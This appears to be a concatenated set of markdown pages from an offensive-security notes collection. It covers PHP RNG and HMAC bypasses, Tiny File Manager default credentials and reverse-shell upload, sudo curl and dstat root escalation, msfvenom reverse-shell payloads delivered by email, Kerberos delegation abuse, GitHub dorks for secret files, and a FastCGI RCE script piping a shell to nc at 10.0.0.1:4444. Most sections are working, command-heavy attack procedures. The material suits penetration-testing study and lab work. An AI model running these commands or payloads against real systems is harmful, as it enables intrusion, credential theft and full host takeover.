52 | 53 | ```html 54 | 55 | ``` 56 | -------------------------------------------------------------------------------- /docs/exploit/web/php-srand-time-guessing.md: -------------------------------------------------------------------------------- 1 | # PHP Srand Time Abusing 2 | 3 | If the website uses “srand(time())” to generate random strings in PHP, we can get the non-random strings by manipulating the attribute of the “srand()” function. 4 | 5 | ## Investigation 6 | 7 | ```php 8 | function generate_random_number() { 9 | srand(time()); 10 | // Some code for generating random number... 11 | return random_numbers; 12 | } 13 | ``` 14 | 15 | For example, assume website uses the above function that generates random numbers or strings to be used for authentications such as activation code, multi-factor security code. 16 | In such cases, we can replace the **“time()”** function with the **“strtotime()”** to make the result to be non-random. 17 | 18 | ## Exploitation 19 | 20 | ### 1. Send Request 21 | 22 | First off, send the request for executing the desired function e.g. **“generate_random_number”** that uses **“srand(time())”**. 23 | See the HTTP response header. 24 | 25 | ```html 26 | Date: Thu, 09 Mar 2023 08:31:35 GMT 27 | ``` 28 | 29 | We can get the time such as **“08:31:35”** so copy this. 30 | 31 | ### 2. Generate Non-Random Result 32 | 33 | We can insert the above Date time as the attribute of **“strtotime()”** function as follow. 34 | 35 | ```php 36 | function generate_random_number() { 37 | srand(strtotime("08:31:35")); 38 | // Some code for generating random number... 39 | echo random_numbers; 40 | } 41 | ``` 42 | 43 | Now execute the above function in PHP playground. 44 | We can get the same result no matter how many times we run it. 
-------------------------------------------------------------------------------- /docs/exploit/web/tiny-file-manager.md: -------------------------------------------------------------------------------- 1 | # Tiny File Manager 2 | 3 | Tiny File Manager is a simple and small file manager with single php file. 4 | 5 | ## Default Credentials 6 | 7 | ```txt 8 | admin:admin@123 9 | user:12345 10 | ``` 11 | 12 | ## Reverse Shell 13 | 14 | If we can login and access the dashboard of the Tiny File Manager, upload the reverse shell script and get a shell. 15 | First, download the reverse shell script. 16 | 17 | ```sh 18 | wget https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php -O shell.php 19 | ``` 20 | 21 | Update values of **“$ip”** and **“$port”** in the above script to our local ip and port for listener which will start. 22 | Then upload the script to the arbitrary folder in the Tiny File Manager dashboard. 23 | 24 | Now start netcat listener. 25 | 26 | ```sh 27 | nc -lvnp 4444 28 | ``` 29 | 30 | Access the page with the uploaded script. e.g. "http://vulnerable.com/uploads/shell.php". 31 | We should get a target shell. 32 | 33 | ## Remote Code Execution (RCE) Version≤2.4.6 34 | 35 | The payload can be downloaded from [Exploit-DB](https://www.exploit-db.com/exploits/50828) 36 | 37 | ```sh 38 | wget https://www.exploit-db.com/raw/50828 -O exploit.sh 39 | dos2unix exploit.sh 40 | chmod +x exploit.sh 41 | ./exploit.sh http://vulnerable.com/index.php admin "admin@123" 42 | ``` 43 | 44 | If you got the “jq not found” error, install it and run again. 
45 | 46 | ```sh 47 | sudo apt install jq 48 | ``` 49 | 50 | ## References 51 | 52 | - [Tiny File Manager](https://github.com/prasathmani/tinyfilemanager) -------------------------------------------------------------------------------- /docs/exploit/cryptography/algorithm/aes-cbc-padding-oracle-attack.md: -------------------------------------------------------------------------------- 1 | # AES-CBC Padding Oracle Attack 2 | 3 | ## Automation 4 | 5 | ### PadBuster 6 | 7 | [PadBuster](https://github.com/AonCyberLabs/PadBuster) is an automated script for performing Padding Oracle attacks. It’s useful to decrypt AES. 8 | 9 | ```sh 10 | # Encrypted Sample -> 2hN2bBPw== 11 | # 16 -> Block site 12 | # -encoding: 0->Base64, 1->Lower Hex, 2->Upper Hex, 3->NET UrlToken, 4->WebSafe Base64 13 | padbuster https://vulnerable.com/?data=2hN2bBPw== 2hN2bBPw== 16 -encoding 0 14 | 15 | # -bruteforce: Brute force against the first block 16 | padbuster https://vulnerable.com/?data=2hN2bBPw== 2hN2bBPw== 16 -encoding 0 -bruteforce 17 | 18 | # -cookies: specify cookie value 19 | padbuster https://vulnerable.com/ 2hN2bBPw== 8 -encoding 0 -cookies "secret=2hN2bBPw==" 20 | 21 | # -plaintext: specify plain text 22 | padbuster https://vulnerable.com/ 2hN2bBPw== 8 -encoding 0 -cookies "secret=2hN2bBPw==" -plaintext "user=admin" 23 | ``` 24 | 25 | ### Padre 26 | 27 | [Padre](https://github.com/glebarez/padre) is an advanced exploiter for Padding Oracle attacks against CBC mode encryption. 28 | 29 | ```sh 30 | # Cookie 31 | padre -u 'https://example.com/profile.php' -cookie 'SESS=$' 'ABCD==' 32 | 33 | # Path 34 | padre -u 'https://example.com/profile/$' 'ABCD==' 35 | 36 | # -e: Specify encode type ('b64' or 'lhex') 37 | padre -u 'https://example.com/profile/$' -e lhex '1234abcd...' 
# -err: Error response contents pattern (regex)
padre -u 'https://example.com/profile/$' -err 'Error' 'ABCD=='
```
-------------------------------------------------------------------------------- /docs/exploit/reconnaissance/subdomain/subdomain-discovery.md: --------------------------------------------------------------------------------
# Subdomain Discovery

Finding subdomains is a reconnaissance step that widens the attack surface of a target.

## Online Tools

- [Subdomain Finder](https://subdomainfinder.c99.nl/)
- [nmmapper](https://www.nmmapper.com/)

## Automation

Reference: [How to find subdomain takeover using httpx + dig](https://medium.com/@DrakenKun/how-to-find-subdomain-takeover-using-httpx-dig-5c2351d380b4)

### Subfinder

To set API keys, add them to `$HOME/.config/subfinder/provider-config.yaml`. See [the ProjectDiscovery documentation](https://docs.projectdiscovery.io/tools/subfinder/install#post-install-configuration) for details.

```sh
# -all: Use all sources for enumeration
# -cs: Include the source of each result in the output (as "subdomain,source"); cut keeps only the subdomain
subfinder -d example.com -all -cs > tmp.txt ; cat tmp.txt | cut -d "," -f 1 > domains.txt ; rm tmp.txt
```

### BBOT

```sh
bbot -t example.com -f subdomain-enum
# After enumerating, see the result file at ~/.bbot/scans/xxxx_xxxx/subdomains.txt
```

## Google Dorks

Use the `site:` operator in Google search.

```sh
site:example.com
site:*.example.com
site:*.*.example.com

# Subdomains including a hyphen ('-') e.g. api-dev.example.com
site:*-*.example.com

# Exclude the 'www' domain
site:*.example.com -site:www.example.com
```

## Subdomain Takeover

After enumerating, it is worth checking for [Subdomain Takeover](subdomain-takeover.md).
50 | -------------------------------------------------------------------------------- /docs/exploit/web/php-hash_hmac_bypass.md: -------------------------------------------------------------------------------- 1 | # PHP hash_hmac Bypass 2 | 3 | ## Investigation 4 | 5 | If the website uses **`hash_hmac`** function on PHP as below, we can bypass by injecting parameters. 6 | 7 | ```php 8 | 24 | ``` 25 | 26 | When executing the following command, the **`hash_hmac`** returns **false**. 27 | 28 | ```bash 29 | php -r "echo hash_hmac('sha256', Array(), 'secret')==false;" 30 | 31 | # Output 32 | PHP Warning: hash_hmac() expects parameter 2 to be string, array given in Command line code on line 1 33 | 1 34 | ``` 35 | 36 | ## Exploitation 37 | 38 | Create a **Hmac hash** by running below. 39 | In the above PHP script, **`$hmac`** needs to be the same as the parameter values of **`hmac`**. 40 | 41 | ```bash 42 | php -r "echo hash_hmac('sha256', 'example.com', false)" 43 | 44 | # Output 45 | 8e35e0a8e5a18b6ef04598dff384c65adf5aced1a1d530b17f86e92eeb9372a8 46 | ``` 47 | 48 | So put the output hmac value into the paramter **"hmac"** and the second arguments ("example.com") into the **host** parameter. 49 | 50 | ```bash 51 | https://example.com/?nonce[]=&hmac=8e35e0a8e5a18b6ef04598dff384c65adf5aced1a1d530b17f86e92eeb9372a8&host=example.com 52 | ``` 53 | -------------------------------------------------------------------------------- /docs/exploit/cryptography/algorithm/rpng-guessing.md: -------------------------------------------------------------------------------- 1 | # RPNG (Pseudo Random Number Generator) Guessing 2 | 3 | We may be able to predict numbers from the previous generated numbers because PRNG does not generate truly random numbers. 4 | 5 | ## Investigation 6 | 7 | Suppose that the following RPNG program in Python. The seed, which is used for the random number generator, is generated from the time when the program runs. 
8 | 9 | ```python 10 | import random 11 | import time 12 | 13 | seed = int(time.time()) 14 | 15 | random.seed(seed) 16 | 17 | num = random.randint(1, 100) 18 | print("Generated number: ", num) 19 | ``` 20 | 21 | If we can get the seed, we can generate the same number as this program. 22 | 23 | ## Exploitation 24 | 25 | There are several ways to guess the number. Here are some of the examples. 26 | 27 | ### Run Program at the Same Time 28 | 29 | If we can retrieve the program source code, we can run the custom exploit inherited from it, then run it at the same time. 30 | 31 | ### Get the Seed from Target System Time 32 | 33 | If we can know when the program executed in target system, we may be able to calculate the seed from the system time of the target. 34 | We can calculate it in online tools like [Epoch Converter](https://www.epochconverter.com/). 35 | When retrieving the seed, we can put it on the original code as below. 36 | 37 | ```python 38 | # This is the seed which is retrieved from the time generated random numbers. 39 | seed = 1724169824 40 | random.seed(seed) 41 | ``` 42 | 43 | As a result, we can get the same number whenever we run the program. -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/curl.md: -------------------------------------------------------------------------------- 1 | # Sudo Curl Privilege Escalation 2 | 3 | The `sudo curl` command might be vulnerable to privilege escalation (PrivEsc). 4 | 5 | ## Investigation 6 | 7 | ```bash 8 | sudo -l 9 | 10 | (root) /usr/bin/curl 127.0.0.1/* 11 | ``` 12 | 13 | If current user is allowed to execute the command above as root privilege, we can read arbitrary files in the target system or can add our SSH key in the root home directory by abusing the asterisk (`*`). 14 | 15 | I found this setting on **Robots** room on TryHackMe. 16 | 17 | ## Exploit 18 | 19 | ### Option 1. 
Read Files 20 | 21 | ```bash 22 | sudo /usr/bin/curl 127.0.0.1/ file:///etc/shadow 23 | ``` 24 | 25 | As above, we can read the content of the `/etc/shadow` as root. 26 | 27 | ### Option 2. Add SSH Key 28 | 29 | We can also add our SSH public key to `/root/.ssh/authorized_keys`. 30 | First, generate SSH keys in our local machine: 31 | 32 | ```bash 33 | ssh-keygen -f key 34 | 35 | # Display the content of the public key, and copy it. 36 | cat key.pub 37 | ``` 38 | 39 | Next, in target machine, write the content of this public key: 40 | 41 | ```bash 42 | echo -n '' > /tmp/key.pub 43 | ``` 44 | 45 | Now, we can write this content to `/root/.ssh/authorized_keys` via `curl`: 46 | 47 | ```bash 48 | sudo /usr/bin/curl 127.0.0.1/ -o /tmp/ignore file:///tmp/key.pub -o /root/.ssh/authorized_keys 49 | ``` 50 | 51 | By this, we can login SSH as root, using our private key: 52 | 53 | ```bash 54 | # Run it our local machine 55 | chmod 600 key 56 | ssh root@ -i key 57 | ``` -------------------------------------------------------------------------------- /docs/exploit/cryptography/algorithm/sha1-hash-collision-attack.md: -------------------------------------------------------------------------------- 1 | # SHA1 Hash Collision Attack 2 | 3 | ## Sample Attacks 4 | 5 | ### 1. Download two Files 6 | 7 | There are several ways to download files. So we can select our desired files as purposes. 8 | 9 | - Download the original two PDF files in [SHAttered](https://shattered.io/). 10 | - Download two custom Files (e.g. messageA and messageB) in [Chosen-Prefix Collision Example](https://sha-mbles.github.io/). 11 | 12 | Check if the SHA1 hash is the same as each other. 13 | 14 | ```bash 15 | sha1sum shattered-1.pdf 16 | sha1sum shattered-2.pdf 17 | 18 | sha1sum messageA 19 | sha1sum messageB 20 | ``` 21 | 22 | ### 2. Host the PDF Files Locally 23 | 24 | In the directory where the two PDF files located, start local server for using in a Python script. 
25 | 26 | ```bash 27 | python3 -m http.server 8000 28 | ``` 29 | 30 | ### 3. Create a Python Script 31 | 32 | For example, create a “test.py”. 33 | 34 | ```python 35 | import requests 36 | 37 | file1 = "shattered-1.pdf" 38 | file2 = "shattered-2.pdf" 39 | 40 | pdf_1 = requests.get(f'http://localhost:8000/{file1}') 41 | pdf_2 = requests.get(f'http://localhost:8000/{file2}') 42 | 43 | # e.g. the two values can be used as username/password. 44 | params = {'username': pdf_1.content, 'password': pdf_2.content} 45 | r = requests.get('https://example.com/login', params=params) 46 | print(r.text) 47 | ``` 48 | 49 | ### 4. Run the Script 50 | 51 | ```bash 52 | python3 test.py 53 | ``` 54 | 55 | ## References 56 | 57 | - [Shattered](https://shattered.io/) 58 | - [sha-mbles](https://sha-mbles.github.io/) -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/dstat.md: -------------------------------------------------------------------------------- 1 | # Sudo Dstat Privilege Escalation 2 | 3 | The `sudo dstat` command might be vulnerable to privilege escalation (PrivEsc). 4 | 5 | **dstat** is a versatile tool for generating system resource statistics. 6 | It allows users to create a custom plugin and execute by adding option e.g. **`dstat --myplugin`**. 7 | 8 | ## Investigation 9 | 10 | ```sh 11 | sudo -l 12 | 13 | (ALL) NOPASSWD: /usr/bin/dstat 14 | ``` 15 | 16 | If we can execute **"dstat"** command as root, we can gain access to privileges by using our malicious plugin. 17 | 18 | ## Exploitation 19 | 20 | ### 1. Create a New Dstat Plugin 21 | 22 | First off, find locate the **"dstat"** directory. 23 | 24 | ```sh 25 | find / -type d -name dstat 2>/dev/null 26 | ``` 27 | 28 | Assume the location of dstat is **“/usr/local/share/dstat”**. 29 | Create a plugin called **"dstat_exploit.py"** under **"/usr/local/share/dstat/"**. 

```python
import os

os.system('chmod +s /usr/bin/bash')
```

dstat recognizes plugins under **"/usr/local/share/dstat/"**.
Check that the plugin above has been picked up by running the following command.

```sh
dstat --list | grep exploit
```

### 2. Execute Dstat with the Malicious Plugin

Now execute **"dstat"** with the **"--exploit"** flag (the flag name is derived from the suffix of the file name, e.g. **"dstat_<name>.py"** gives `--<name>`).

```sh
sudo /usr/bin/dstat --exploit
```

The exploit plugin has run, so we can now get a root shell:

```sh
bash -p
```

--------------------------------------------------------------------------------
/docs/exploit/network/shell/reverse-shell-using-metasploit.md:
--------------------------------------------------------------------------------

# Reverse Shell using Metasploit

We can create a reverse shell payload using Msfvenom and listen for the reverse connection with Msfconsole.

## Generate Reverse Shell Payload

### 1. Create a Payload using MsfVenom

```bash
# Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o shell.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o shell.elf

# Windows
msfvenom -p windows/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f aspx -o shell.aspx
```

### 2. Start Listener using MsfConsole

```bash
msfconsole
msf> use exploit/multi/handler

# Linux
msf> set payload linux/x86/meterpreter/reverse_tcp
# Windows
msf> set payload windows/meterpreter/reverse_tcp
# or
msf> set payload windows/x64/meterpreter/reverse_tcp

msf> set lhost 10.0.0.1
msf> set lport 4444
msf> run
meterpreter> shell
```

### 3. Send the Generated File to Target Machine

After that, we need to deliver the generated malicious file to the target machine somehow, for example:

- Send an email with this file attached.
- Upload this file to the target web server.

Once a user on the target machine executes this file, we should get a shell on the target system.

--------------------------------------------------------------------------------
/docs/exploit/web/dump-git-repository-from-website.md:
--------------------------------------------------------------------------------

# Dump Git Repository from Website

If we have permission to access the git repository on a target website, we can dump it and investigate the git logs and history for sensitive information.

## Dumping

### Method 1. Git-Dumper

[git-dumper](https://github.com/arthaud/git-dumper) is a useful Python package.

```bash
pipx install git-dumper
git-dumper https://example.com/.git ./dumped
```

### Method 2. GitTools

[GitTools](https://github.com/internetwache/GitTools) downloads the Git repository of the web application.
To dump the repository, execute the following commands.

```bash
wget https://raw.githubusercontent.com/internetwache/GitTools/master/Dumper/gitdumper.sh
chmod +x gitdumper.sh
./gitdumper.sh https://example.com/.git/ ./example
```

We should now have the git repository locally.
Then extract the entire project by executing the following.
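An added example for the server side of this technique (written for this page, not part of GitTools or git-dumper): the requests both dumpers make leave a distinctive trail in the web server's access log, so a defender can tell whether a `.git` directory was merely probed or actually served. The log lines are constructed for the example and the client addresses are documentation-range placeholders.

```python
# Added example (not from the original notes): spot .git probing in a web
# server access log. The log lines below are constructed; the client
# addresses are documentation-range placeholders.
import re
from collections import defaultdict

# One line of the combined log format that nginx and Apache write by default.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Any request for a path component named .git (dumpers start with
# /.git/HEAD and /.git/config, then walk objects/ and refs/).
GIT_PATH_RE = re.compile(r'(^|/)\.git(/|$)')

SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.5 - - [10/Jan/2024:10:00:02 +0000] "GET /.git/HEAD HTTP/1.1" 200 23
203.0.113.5 - - [10/Jan/2024:10:00:02 +0000] "GET /.git/config HTTP/1.1" 200 137
203.0.113.5 - - [10/Jan/2024:10:00:03 +0000] "GET /.git/objects/ab/cd1234 HTTP/1.1" 200 411
198.51.100.7 - - [10/Jan/2024:10:05:00 +0000] "GET /.git/HEAD HTTP/1.1" 403 162
198.51.100.9 - - [10/Jan/2024:10:06:00 +0000] "GET /app/.git/index HTTP/1.1" 404 153
"""


def scan_git_access(log_text):
    """Per client: how many .git paths it requested and how many the server served (2xx)."""
    per_client = defaultdict(lambda: {"requests": 0, "served": 0})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not GIT_PATH_RE.search(m.group("path")):
            continue
        entry = per_client[m.group("ip")]
        entry["requests"] += 1
        if m.group("status").startswith("2"):
            entry["served"] += 1  # repository content actually left the server
    return dict(per_client)


def exposed_clients(log_text):
    """Clients that received .git content: the repository should be assumed dumped."""
    return sorted(ip for ip, e in scan_git_access(log_text).items() if e["served"])


if __name__ == "__main__":
    for ip, entry in scan_git_access(SAMPLE_LOG).items():
        print(ip, entry)
    print("exposed to:", exposed_clients(SAMPLE_LOG))
```

A client listed by `exposed_clients()` has received repository content, so the repository, including its full history and any secret ever committed, should be treated as public; the 403 and 404 rows show what the log looks like when `.git` is denied at the web server or was never deployed into the document root. The remaining step of the dump, the extractor, follows.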

```bash
wget https://raw.githubusercontent.com/internetwache/GitTools/master/Extractor/extractor.sh
chmod +x extractor.sh
./extractor.sh ./example ./new_example
```

Now we have retrieved the entire git project from the website.
It is stored in the **“./new_example”** folder, and we can investigate the repository.

## After Dumping…

If we succeed in dumping, we can investigate the repository with the `git` command and look for sensitive information. See [Git GitHub Pentesting](https://exploit-notes.hdks.org/exploit/version-control/git/git-github-pentesting/).

--------------------------------------------------------------------------------
/docs/exploit/game/webassembly-games-hacking.md:
--------------------------------------------------------------------------------

# WebAssembly Games Hacking

## Tools

- **[Cetus](https://github.com/Qwokka/Cetus/)**

  A browser extension for hacking WebAssembly games. To use it, open the developer tools in Chrome or Firefox and select the Cetus tab.

## Guess the Random Number

1. First, try guessing the number manually. You will probably be wrong; copy the resulting value.
2. Open the developer tools and Cetus; in the Search panel, paste the number into the Value field.
3. Select “EQ (equal)” and the Value Type, and set “Only Aligned Address?” to "yes".
4. Click the “Search” button.
5. If you get no result, try again.
6. If you get a result, click the bookmark icon to the right of it.
7. Move to the Bookmarks panel.
8. Make another guess; you should see the value of the bookmark change.
9. Convert the hex value to a decimal number and input it.

## Manipulate Character’s Health

Reference: [https://github.com/Qwokka/Cetus/wiki/Cetus-101---Invincibility](https://github.com/Qwokka/Cetus/wiki/Cetus-101---Invincibility)

1. Open the Search panel, leave the Value field empty and click the Search (or Restart Search) button.
2. Take damage on purpose.
3. In the Search panel of Cetus, select the “LT” operator and search again.
4. It will show the results.
5. One of the results is most likely the Health you just lost, so bookmark it.
6. Move to the Bookmarks panel and check “Freeze” on the address you’ve just bookmarked.
7. Your HP is now frozen, so taking damage shouldn't reduce it.

--------------------------------------------------------------------------------
/docs/exploit/windows/active-directory/constrained-delegation-attack.md:
--------------------------------------------------------------------------------

# Constrained Delegation Attack

If a compromised account has the Kerberos Constrained Delegation right, the account may impersonate another user to request a Kerberos service ticket and use it, for instance, to sign in to services.

## Investigation

### Check if Kerberos Constrained Delegation Enabled for User

Reference: [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation#prerequisites](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation#prerequisites)

```powershell
Get-NetUser -TrustedToAuth
```

## Exploit

### 1. Request Service Ticket for Another User

The target SPN needs to be allowed for delegation.

```bash
# -k: Use Kerberos Auth
impacket-getST -k -impersonate Administrator -spn cifs/dc.example.local example.local/UserName
```

### 2. Use the Service Ticket

After getting the service ticket, we can use it for further pentesting.
We need to set the environment variable as below:

```bash
export KRB5CCNAME=`pwd`/Administrator.ccache

# Check by listing tickets.
# If the klist command is not found, install it with `apt install krb5-user`
klist
```

- Log in to services with Kerberos auth:

```bash
# -k: Use Kerberos Auth
# -no-pass: No password
impacket-wmiexec example.local/Administrator@example.local -k -no-pass
```

--------------------------------------------------------------------------------
/docs/exploit/reconnaissance/osint/github-dorks.md:
--------------------------------------------------------------------------------

# GitHub Dorks

## Common Credentials

```sh
path:.env
path:.env passwd
path:.env password
path:.env secret

path:*.env api
path:*.env passwd
path:*.env password
path:*.env secret

path:config.* auth
path:config.* password
path:config.* passwd
path:config.* token
path:config.json password

"example.com" password
"example.com" passwd
"example.com" credential
"example.com" creds
```

## Web Conf

```sh
path:.htpasswd
```

## WordPress

```sh
path:wp-config.php
```

## Databases

```sh
path:*.db
path:*.sqlite3
path:.pgpass
path:my.cnf
path:redis.conf
path:mongod.conf
```

## Git

```sh
path:.git-credentials
```

## Bash

```sh
path:.bash_history
path:.bash_profile
path:.bashrc
path:.profile

path:.bashrc password
path:.bash_history root

path:etc/passwd
path:etc/shadow

path:password.*
```

## SSH

```sh
path:id_rsa
path:private_key
path:.ssh/id_rsa
```

## Docker

```sh
path:docker.conf
path:docker.service
```

## Backup Files

```sh
path:*.bak
path:*.old
path:backup
path:backups
```

## References

- [GitHub Dorks](https://github.com/techgaun/github-dorks)

--------------------------------------------------------------------------------
/docs/exploit/network/fastcgi.md:
--------------------------------------------------------------------------------

# FastCGI Pentesting

FastCGI is a binary protocol for interfacing interactive programs with a web server. It uses port 9000 by default.

## Investigation

If **PHP-FPM (FastCGI Process Manager)** is running on the target system, we might be able to execute arbitrary commands.

```bash
ps aux | cat

php-fpm: pool username
```

## Remote Code Execution

Reference: [https://book.hacktricks.xyz/network-services-pentesting/9000-pentesting-fastcgi](https://book.hacktricks.xyz/network-services-pentesting/9000-pentesting-fastcgi)

We need to create an arbitrary PHP file somewhere. For instance,

```bash
touch /dev/shm/index.php
```

Then create a shell script named **"exploit.sh"**.

```bash
#!/bin/bash

PAYLOAD="&1|nc 10.0.0.1 4444 >/tmp/f'); echo '-->';"
FILENAMES="/dev/shm/index.php" # Existing file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done
```

Now execute the shell script. Of course, we have to start a listener on our local machine for the reverse shell before executing the following command.
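An added check from the defender's side (written for this page, not from the original notes or the referenced HackTricks page): the script above only works when the PHP-FPM FastCGI port accepts connections from wherever `$HOST` points, so the pool configuration decides whether the attack is possible at all. The pool files below are constructed samples; the function classifies the `listen` setting together with the `listen.allowed_clients` allow-list.

```python
# Added example (not from the original notes): flag a PHP-FPM pool whose
# FastCGI listener is reachable without a client allow-list, which is what the
# cgi-fcgi script above needs. The pool files below are constructed samples.
LOOPBACK_HOSTS = {"127.0.0.1", "::1", "localhost"}

WEAK_POOL = """\
[www]
user = www-data
group = www-data
; any host that can reach TCP port 9000 may submit FastCGI requests,
; including PHP_VALUE overrides such as auto_prepend_file
listen = 0.0.0.0:9000
"""

LOCAL_POOL = """\
[www]
user = www-data
group = www-data
listen = 127.0.0.1:9000
listen.allowed_clients = 127.0.0.1
"""

HARDENED_POOL = """\
[www]
user = www-data
group = www-data
; a unix socket is reachable only by processes the file mode allows
listen = /run/php/php-fpm.sock
listen.owner = www-data
listen.group = www-data
listen.mode = 0660
"""


def parse_pool(conf_text):
    """Collect key = value settings from a php-fpm pool file; ';' starts a comment."""
    settings = {}
    for raw in conf_text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            settings[key.strip()] = value.strip()
    return settings


def assess_pool(conf_text):
    """Classify the listener: unix socket, TCP with allow-list, loopback TCP, or open TCP."""
    settings = parse_pool(conf_text)
    listen = settings.get("listen", "")
    allowed = [c.strip() for c in settings.get("listen.allowed_clients", "").split(",") if c.strip()]
    if listen.startswith("/"):
        verdict = "ok-unix-socket"
    else:
        # php-fpm accepts "ip:port" or a bare "port"; a bare port binds every interface
        host = listen.rsplit(":", 1)[0] if ":" in listen else ""
        if host.startswith("[") and host.endswith("]"):
            host = host[1:-1]  # bracketed IPv6 literal
        if allowed:
            verdict = "ok-tcp-allowlist"
        elif host in LOOPBACK_HOSTS:
            verdict = "ok-tcp-loopback"  # remote hosts are kept out, local processes are not
        else:
            verdict = "weak-tcp-open"
    return {"listen": listen, "allowed_clients": allowed, "verdict": verdict}


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_POOL), ("local", LOCAL_POOL), ("hardened", HARDENED_POOL)):
        print(name, assess_pool(conf))
```

A loopback-bound TCP listener keeps remote hosts out but remains reachable by every local process, so a unix socket with a restrictive `listen.mode` is the stronger setting. The command that runs the script follows.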

```bash
chmod +x exploit.sh
./exploit.sh <target-host>
```

--------------------------------------------------------------------------------
/docs/exploit/cryptography/algorithm/des.md:
--------------------------------------------------------------------------------

# DES (Data Encryption Standard)

DES is a symmetric-key algorithm for the encryption of digital data. Its effective key is only 56 bits, so it is no longer considered secure for protecting data; it is shown here for working with legacy material.

## Basic Encryption/Decryption with OpenSSL

### 1. Prepare Plain Text File

First, we create a text file which contains the single word "hello".

```sh
echo hello > hello.txt
```

### 2. Encrypt the Plain Text File

Using `openssl`, we can encrypt the file with the **DES** algorithm. We're asked for a password, so enter a new one.

```sh
openssl des -e -in hello.txt -out encrypted.enc
```

After encryption, we can send the encrypted file to someone else, and they can decrypt it with the DES algorithm.

### 3. Decrypt the Encrypted File

For decryption we use almost the same command, but with the `-d` (decrypt) option instead of `-e` (encrypt). We'll be asked for the password set during encryption, so enter the same password.

```sh
openssl des -d -in encrypted.enc -out decrypted.txt
```

After decryption, confirm that the content of `decrypted.txt` is the same as that of the original `hello.txt`.

```sh
cat decrypted.txt
# hello
```

## Triple DES

**Triple DES (3DES)** applies the **DES** cipher algorithm three times to each data block.
The encryption/decryption process with `openssl` is almost the same as for **DES** (use the `des3` cipher instead of `des`), so I'll write it briefly here.

```sh
# Encryption
openssl des3 -e -in hello.txt -out encrypted.enc

# Decryption
openssl des3 -d -in encrypted.enc -out decrypted.txt
```